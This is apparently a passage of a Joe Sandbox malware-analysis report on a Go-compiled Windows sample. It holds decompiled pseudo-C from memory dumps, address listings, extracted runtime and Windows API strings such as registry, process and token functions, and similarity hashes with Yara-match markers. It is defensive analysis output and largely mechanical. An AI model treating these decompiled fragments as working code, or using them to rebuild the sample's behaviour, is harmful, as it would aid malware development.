																		_t236 = _t233 + _t222;
																		_t158 = ( *(_t233 + 0x32) & 0x7fff) + _t152 & 0x0000ffff;
																		if(_t215 > _t222) {
																			L45:
																			L01358980();
																			goto L46;
																		}
																		L39:
																		_t223 = _t222 - _t215;
																		_t51 = _t215 - 0x100000; // -1048576
																		_t218 = _t215 << 0x00000003 & _t51 >> 0x0000003f;
																		_t227 = _t236 + _t218;
																		L43:
																		while(_t218 < _t223) {
																			_t257 =  *((intOrPtr*)(_t227 + _t218 * 8));
																			_t218 = _t218 + 1;
																			r9d =  *(_t257 + 0x15) & 0x000000ff;
																			_t238 = _t236 + _t258;
																			_t258 =  ~_t258;
																			_t236 = (_t238 - 0x00000001 & _t258) +  *_t257;
																		}
																		_v120 = _t236;
																		E01313AC0(_t158, _t242, _t269);
																		asm("inc esp");
																		asm("inc esp");
																		asm("inc esp");
																		_v56 = E013145E0;
																		_v48 =  &_a8;
																		_v40 =  &_a24;
																		_v32 = _v120 + 0x00000007 & 0xfffffff8;
																		_v24 = _v96;
																		_v16 = _v88;
																		 *_t249 =  &_v56;
																		_t146 = E013560C0(0, _t158, _t166, _t167, 0, _t171, _t172, _t189, _t242, _t259, _t263, _t268, _t269, _t274);
																		asm("inc ebp");
																		return _t146;
																	}
																}
															}
														}
													}
												} else {
													L13:
													goto L53;
												}
											}
										}
									} else {
										L6:
										_t219 = _a16;
										_t224 = 0x14cf4f8;
										if(_t219 == 0x14cf4f8) {
											L8:
											return __eax;
										} else {
											L7:
											_t199 = 0x146a760;
											L55:
											if(_t199 == 0) {
												L66:
												E01330BA0(0x138e9d5, _t215, _t242);
												goto L67;
											} else {
												L56:
												_t224 = _t219;
												if( *((intOrPtr*)(_t199 + 0xc0)) > _t219 ||  *((intOrPtr*)(_t199 + 0xc8)) <= _t219) {
													L58:
													if( *((intOrPtr*)(_t199 + 0xd0)) > _t219 ||  *((intOrPtr*)(_t199 + 0xd8)) <= _t219) {
														L60:
														if( *((intOrPtr*)(_t199 + 0xe0)) > _t219) {
															L63:
															if( *((intOrPtr*)(_t199 + 0xf0)) > _t219 ||  *((intOrPtr*)(_t199 + 0xf8)) <= _t219) {
																L54:
																_t199 =  *((intOrPtr*)(_t199 + 0x220));
																_t219 = _t224;
																goto L55;
															} else {
																goto L65;
															}
														} else {
															L61:
															if( *((intOrPtr*)(_t199 + 0xe8)) > _t219) {
																goto L65;
															} else {
																L62:
																goto L63;
															}
														}
													} else {
														goto L65;
													}
												} else {
													L65:
													return _t114;
												}
											}
										}
									}
								}
							}
						}
					}
					L71:
					L70:
					_a8 = _t190;
					_a16 = _t215;
					_a24 = _t219;
					_a32 = _t229;
					E01356200(_t224, _t242);
				}
			}





























































                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f80
                                                                                                                            0x01313f89
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01313f8f
                                                                                                                            0x01313f8f
                                                                                                                            0x01313f96
                                                                                                                            0x01313f9e
                                                                                                                            0x01313fa6
                                                                                                                            0x01313fae
                                                                                                                            0x01313fb6
                                                                                                                            0x01313fbe
                                                                                                                            0x01313fcd
                                                                                                                            0x01314269
                                                                                                                            0x01314278
                                                                                                                            0x01313fd3
                                                                                                                            0x01313fd3
                                                                                                                            0x01313fd3
                                                                                                                            0x01313fe3
                                                                                                                            0x01314595
                                                                                                                            0x01314595
                                                                                                                            0x013145a1
                                                                                                                            0x00000000
                                                                                                                            0x01313fe9
                                                                                                                            0x01313fe9
                                                                                                                            0x01313fed
                                                                                                                            0x01313ff3
                                                                                                                            0x01314565
                                                                                                                            0x01314565
                                                                                                                            0x0131456f
                                                                                                                            0x01314572
                                                                                                                            0x0131457c
                                                                                                                            0x01314584
                                                                                                                            0x0131458b
                                                                                                                            0x01314590
                                                                                                                            0x00000000
                                                                                                                            0x01313ff9
                                                                                                                            0x01313ff9
                                                                                                                            0x01314000
                                                                                                                            0x01314553
                                                                                                                            0x01314553
                                                                                                                            0x01314560
                                                                                                                            0x00000000
                                                                                                                            0x01314006
                                                                                                                            0x01314006
                                                                                                                            0x01314006
                                                                                                                            0x0131400e
                                                                                                                            0x01314013
                                                                                                                            0x0131401b
                                                                                                                            0x0131404d
                                                                                                                            0x0131404d
                                                                                                                            0x01314055
                                                                                                                            0x0131405b
                                                                                                                            0x01314087
                                                                                                                            0x01314087
                                                                                                                            0x00000000
                                                                                                                            0x0131405d
                                                                                                                            0x0131405d
                                                                                                                            0x0131405d
                                                                                                                            0x01314062
                                                                                                                            0x01314069
                                                                                                                            0x013144bd
                                                                                                                            0x013144bd
                                                                                                                            0x013144c9
                                                                                                                            0x00000000
                                                                                                                            0x0131407a
                                                                                                                            0x0131407a
                                                                                                                            0x01314080
                                                                                                                            0x0131408c
                                                                                                                            0x0131408c
                                                                                                                            0x01314097
                                                                                                                            0x0131420b
                                                                                                                            0x0131420b
                                                                                                                            0x0131421b
                                                                                                                            0x0131422b
                                                                                                                            0x0131423b
                                                                                                                            0x01314240
                                                                                                                            0x01314245
                                                                                                                            0x01314268
                                                                                                                            0x0131409d
                                                                                                                            0x0131409d
                                                                                                                            0x013140a1
                                                                                                                            0x013140a8
                                                                                                                            0x0131448a
                                                                                                                            0x0131448a
                                                                                                                            0x0131448d
                                                                                                                            0x01314492
                                                                                                                            0x01314497
                                                                                                                            0x0131449a
                                                                                                                            0x0131449d
                                                                                                                            0x013144a4
                                                                                                                            0x013144ac
                                                                                                                            0x013144b3
                                                                                                                            0x013144b8
                                                                                                                            0x00000000
                                                                                                                            0x013140ae
                                                                                                                            0x013140ae
                                                                                                                            0x013140ae
                                                                                                                            0x013140b3
                                                                                                                            0x013140b7
                                                                                                                            0x013140c5
                                                                                                                            0x01314420
                                                                                                                            0x01314420
                                                                                                                            0x01314425
                                                                                                                            0x0131442d
                                                                                                                            0x01314432
                                                                                                                            0x01314437
                                                                                                                            0x0131443c
                                                                                                                            0x01314443
                                                                                                                            0x01314447
                                                                                                                            0x01314450
                                                                                                                            0x01314455
                                                                                                                            0x0131445d
                                                                                                                            0x01314462
                                                                                                                            0x01314469
                                                                                                                            0x01314472
                                                                                                                            0x01314477
                                                                                                                            0x01314480
                                                                                                                            0x01314485
                                                                                                                            0x00000000
                                                                                                                            0x013140cb
                                                                                                                            0x013140cb
                                                                                                                            0x013140cb
                                                                                                                            0x013140d3
                                                                                                                            0x013143c5
                                                                                                                            0x013143c5
                                                                                                                            0x013143ca
                                                                                                                            0x013143d2
                                                                                                                            0x013143d7
                                                                                                                            0x013143e0
                                                                                                                            0x013143e5
                                                                                                                            0x013143ea
                                                                                                                            0x013143f7
                                                                                                                            0x013143fe
                                                                                                                            0x01314407
                                                                                                                            0x0131440c
                                                                                                                            0x01314413
                                                                                                                            0x01314418
                                                                                                                            0x00000000
                                                                                                                            0x013140d9
                                                                                                                            0x013140d9
                                                                                                                            0x013140d9
                                                                                                                            0x013140e4
                                                                                                                            0x013140ed
                                                                                                                            0x013140e6
                                                                                                                            0x013140e6
                                                                                                                            0x013140e6
                                                                                                                            0x013140f5
                                                                                                                            0x013143bc
                                                                                                                            0x013143c0
                                                                                                                            0x00000000
                                                                                                                            0x013140fb
                                                                                                                            0x013140fb
                                                                                                                            0x013140fb
                                                                                                                            0x013140ff
                                                                                                                            0x01314107
                                                                                                                            0x0131410d
                                                                                                                            0x0131410d
                                                                                                                            0x01314112
                                                                                                                            0x0131411a
                                                                                                                            0x01314162
                                                                                                                            0x01314162
                                                                                                                            0x01314165
                                                                                                                            0x0131416d
                                                                                                                            0x01314176
                                                                                                                            0x01314180
                                                                                                                            0x01314188
                                                                                                                            0x0131416f
                                                                                                                            0x0131416f
                                                                                                                            0x0131416f
                                                                                                                            0x0131418d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01314193
                                                                                                                            0x01314193
                                                                                                                            0x01314198
                                                                                                                            0x0131419c
                                                                                                                            0x013141a5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013141ab
                                                                                                                            0x013141ab
                                                                                                                            0x013141b0
                                                                                                                            0x01314120
                                                                                                                            0x01314120
                                                                                                                            0x01314124
                                                                                                                            0x0131435a
                                                                                                                            0x0131435a
                                                                                                                            0x0131435f
                                                                                                                            0x01314367
                                                                                                                            0x0131436c
                                                                                                                            0x01314371
                                                                                                                            0x01314376
                                                                                                                            0x0131437b
                                                                                                                            0x01314388
                                                                                                                            0x0131438f
                                                                                                                            0x01314398
                                                                                                                            0x0131439d
                                                                                                                            0x013143a4
                                                                                                                            0x013143a9
                                                                                                                            0x013143ae
                                                                                                                            0x013143ae
                                                                                                                            0x00000000
                                                                                                                            0x013143ae
                                                                                                                            0x0131412a
                                                                                                                            0x0131412f
                                                                                                                            0x01314135
                                                                                                                            0x01314135
                                                                                                                            0x0131413d
                                                                                                                            0x01314140
                                                                                                                            0x01314143
                                                                                                                            0x0131414b
                                                                                                                            0x013143b5
                                                                                                                            0x013143b5
                                                                                                                            0x00000000
                                                                                                                            0x013143b5
                                                                                                                            0x01314151
                                                                                                                            0x01314151
                                                                                                                            0x01314156
                                                                                                                            0x0131415b
                                                                                                                            0x0131415b
                                                                                                                            0x0131412f
                                                                                                                            0x0131411a
                                                                                                                            0x013141b3
                                                                                                                            0x013141ba
                                                                                                                            0x013141ba
                                                                                                                            0x013141d2
                                                                                                                            0x013141d6
                                                                                                                            0x013141d8
                                                                                                                            0x013141db
                                                                                                                            0x013141e3
                                                                                                                            0x01314353
                                                                                                                            0x01314355
                                                                                                                            0x00000000
                                                                                                                            0x01314355
                                                                                                                            0x013141e9
                                                                                                                            0x013141e9
                                                                                                                            0x013141ec
                                                                                                                            0x013141fb
                                                                                                                            0x013141fe
                                                                                                                            0x00000000
                                                                                                                            0x01314296
                                                                                                                            0x01314279
                                                                                                                            0x0131427d
                                                                                                                            0x01314280
                                                                                                                            0x01314285
                                                                                                                            0x0131428d
                                                                                                                            0x01314293
                                                                                                                            0x01314293
                                                                                                                            0x0131429b
                                                                                                                            0x013142a0
                                                                                                                            0x013142a5
                                                                                                                            0x013142ae
                                                                                                                            0x013142b7
                                                                                                                            0x013142c7
                                                                                                                            0x013142d7
                                                                                                                            0x013142e7
                                                                                                                            0x013142fc
                                                                                                                            0x01314309
                                                                                                                            0x01314316
                                                                                                                            0x01314326
                                                                                                                            0x0131432a
                                                                                                                            0x0131432f
                                                                                                                            0x01314352
                                                                                                                            0x01314352
                                                                                                                            0x013140f5
                                                                                                                            0x013140d3
                                                                                                                            0x013140c5
                                                                                                                            0x013140a8
                                                                                                                            0x01314082
                                                                                                                            0x01314082
                                                                                                                            0x00000000
                                                                                                                            0x01314082
                                                                                                                            0x01314080
                                                                                                                            0x01314069
                                                                                                                            0x0131401d
                                                                                                                            0x0131401d
                                                                                                                            0x0131401d
                                                                                                                            0x01314025
                                                                                                                            0x0131402f
                                                                                                                            0x0131403d
                                                                                                                            0x0131404c
                                                                                                                            0x01314031
                                                                                                                            0x01314031
                                                                                                                            0x01314031
                                                                                                                            0x013144d8
                                                                                                                            0x013144db
                                                                                                                            0x01314542
                                                                                                                            0x0131454e
                                                                                                                            0x00000000
                                                                                                                            0x013144dd
                                                                                                                            0x013144dd
                                                                                                                            0x013144dd
                                                                                                                            0x013144e7
                                                                                                                            0x013144f2
                                                                                                                            0x013144f9
                                                                                                                            0x01314509
                                                                                                                            0x01314510
                                                                                                                            0x01314520
                                                                                                                            0x01314527
                                                                                                                            0x013144ce
                                                                                                                            0x013144ce
                                                                                                                            0x013144d5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01314512
                                                                                                                            0x01314512
                                                                                                                            0x01314519
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01314519
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01314532
                                                                                                                            0x01314532
                                                                                                                            0x01314541
                                                                                                                            0x01314541
                                                                                                                            0x013144e7
                                                                                                                            0x013144db
                                                                                                                            0x0131402f
                                                                                                                            0x0131401b
                                                                                                                            0x01314000
                                                                                                                            0x01313ff3
                                                                                                                            0x01313fe3
                                                                                                                            0x00000000
                                                                                                                            0x013145a7
                                                                                                                            0x013145a7
                                                                                                                            0x013145ac
                                                                                                                            0x013145b1
                                                                                                                            0x013145b6
                                                                                                                            0x013145c0
                                                                                                                            0x013145d4

                                                                                                                            Strings
                                                                                                                            • nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.ful, xrefs: 01314553
                                                                                                                            • , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpen, xrefs: 0131449D
                                                                                                                            • runtime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceattempt to clear non-e, xrefs: 0131439D, 0131440C, 01314477
                                                                                                                            • , not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRtlMoveMemoryVirtualUnlockWriteConsoleWbad flushGen bad map state, xrefs: 01314575
                                                                                                                            • to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotatio, xrefs: 01314388, 013143F7, 01314462
                                                                                                                            • because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGetComputerNameExWGetExitCodeProcessGetFileAttributesWGetModuleFileNameWIran Sta, xrefs: 0131443C
                                                                                                                            • runtime.SetFinalizer: pointer not at beginning of allocated blockcannot convert slice with length %y to pointer to array with length %xtoo many concurrent operations on a single file or socket (max 1048575)QueryPerformanceFrequency syscall returned zero, runni, xrefs: 013144BD
                                                                                                                            • runtime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnun, xrefs: 01314595
                                                                                                                            • runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testacquireSudog: , xrefs: 013144AC
                                                                                                                            • runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint over, xrefs: 01314584
                                                                                                                            • runtime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintpt, xrefs: 01314542
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGetComputerNameExWGetExitCodeProcessGetFileAttributesWGetModuleFileNameWIran Sta$ to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotatio$, not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpen$, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRtlMoveMemoryVirtualUnlockWriteConsoleWbad flushGen bad map state$nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.ful$runtime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceattempt to clear non-e$runtime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnun$runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint over$runtime.SetFinalizer: pointer not at beginning of allocated blockcannot convert slice with length %y to pointer to array with length %xtoo many concurrent operations on a single file or socket (max 1048575)QueryPerformanceFrequency syscall returned zero, runni$runtime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintpt$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testacquireSudog:
                                                                                                                            • API String ID: 0-1099859943
                                                                                                                            • Opcode ID: fb285ec4960ae5c3ae62f09f9a91cbec809ec28cbdd2edcd919d5c6ec6d246e3
                                                                                                                            • Instruction ID: 7a896c31bfe0a96b4235a384f8e44441062bbf0d74b19bb856ebc6fdeebf4a18
                                                                                                                            • Opcode Fuzzy Hash: fb285ec4960ae5c3ae62f09f9a91cbec809ec28cbdd2edcd919d5c6ec6d246e3
                                                                                                                            • Instruction Fuzzy Hash: ACE19B32609B85C2EB649F59F4403AEB7A4F784B88F888526DB8D17B59DF3CD095CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01305680 Relevance: 14.0, Strings: 11, Instructions: 201COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • debugCal, xrefs: 01305772
                                                                                                                            • l819, xrefs: 013058E8
                                                                                                                            • debugCall2048exchange fullfatal error: gethostbynamegetservbynamelevel 3 resetload64 failedmin too largenil stackbaseout of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize, xrefs: 01305861
                                                                                                                            • call from within the Go runtimecannot assign requested addresscasgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep, xrefs: 01305934, 01305942
                                                                                                                            • debugCal, xrefs: 013058C0
                                                                                                                            • call from unknown functioncorrupted semaphore ticketentersyscall inconsistent forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type, xrefs: 013056CD, 013056D9
                                                                                                                            • debugCal, xrefs: 01305713
                                                                                                                            • debugCal, xrefs: 013057DC
                                                                                                                            • call not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreach, xrefs: 013059AD, 013059B9
                                                                                                                            • debugCal, xrefs: 0130587F
                                                                                                                            • runtime., xrefs: 0130590F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: call from unknown functioncorrupted semaphore ticketentersyscall inconsistent forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type$call from within the Go runtimecannot assign requested addresscasgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep$call not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreach$debugCal$debugCal$debugCal$debugCal$debugCal$debugCall2048exchange fullfatal error: gethostbynamegetservbynamelevel 3 resetload64 failedmin too largenil stackbaseout of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize$l819$runtime.
                                                                                                                            • API String ID: 0-948186835
                                                                                                                            • Opcode ID: a38d8753542de797544b83cad16e3757bb9c43471e6cc0690cb233aba41b347b
                                                                                                                            • Instruction ID: 16bcb3d17fe196a51d516661c6e81694f5818676f489f29666e26e7217965eb6
                                                                                                                            • Opcode Fuzzy Hash: a38d8753542de797544b83cad16e3757bb9c43471e6cc0690cb233aba41b347b
                                                                                                                            • Instruction Fuzzy Hash: 4C817376605788C5EE278B0DD060369BBE4F389BACF58D416CB4A43BA5EB78C585CF01
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ADA730 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1812809483-0
                                                                                                                            • Opcode ID: d95c7a9a2c17d7a8e9f5c47f13abea7a60952c142b5a5079d9c101ee9c9769dd
                                                                                                                            • Instruction ID: 32268aeeda6cc50ee421abba3e2aad979f94e95b5756a22c949b72382e462a9d
                                                                                                                            • Opcode Fuzzy Hash: d95c7a9a2c17d7a8e9f5c47f13abea7a60952c142b5a5079d9c101ee9c9769dd
                                                                                                                            • Instruction Fuzzy Hash: 0F510633514E1A4AEF66AB188C4E3B973E2EB14333F74422AB455C79D5E734EC428269
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A89B30 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A89B30(void* __edx, intOrPtr* __rax, void* __rcx, void* __rdx) {
				void* _t1;

				r9d = 0;
				if ( *0xf8aa3ab8 != r9d) goto 0xf8a89bb9;
				if (__rcx != 0) goto 0xf8a89b65;
				_t1 = E0000025B25BF8A7B89C(__rax);
				 *__rax = 0x16;
				E0000025B25BF8A7BEC4(_t1);
				return 0x7fffffff;
			}




                                                                                                                            0x25bf8a89b34
                                                                                                                            0x25bf8a89b44
                                                                                                                            0x25bf8a89b49
                                                                                                                            0x25bf8a89b4b
                                                                                                                            0x25bf8a89b50
                                                                                                                            0x25bf8a89b56
                                                                                                                            0x25bf8a89b64

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1812809483-0
                                                                                                                            • Opcode ID: b6ec1a0d66ab53b6d553519bfce0c2bda9e21283b74d3cf7fdb0c3fc1606eba2
                                                                                                                            • Instruction ID: 694246047876d302abc54948f0364ca4273ec14dce48acd7e3ed8a6445473014
                                                                                                                            • Opcode Fuzzy Hash: b6ec1a0d66ab53b6d553519bfce0c2bda9e21283b74d3cf7fdb0c3fc1606eba2
                                                                                                                            • Instruction Fuzzy Hash: 9E41E2B3600A508AFF62AB11AC4C3AD76E1E754BB7F784125FB5443EC5D73688419738
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

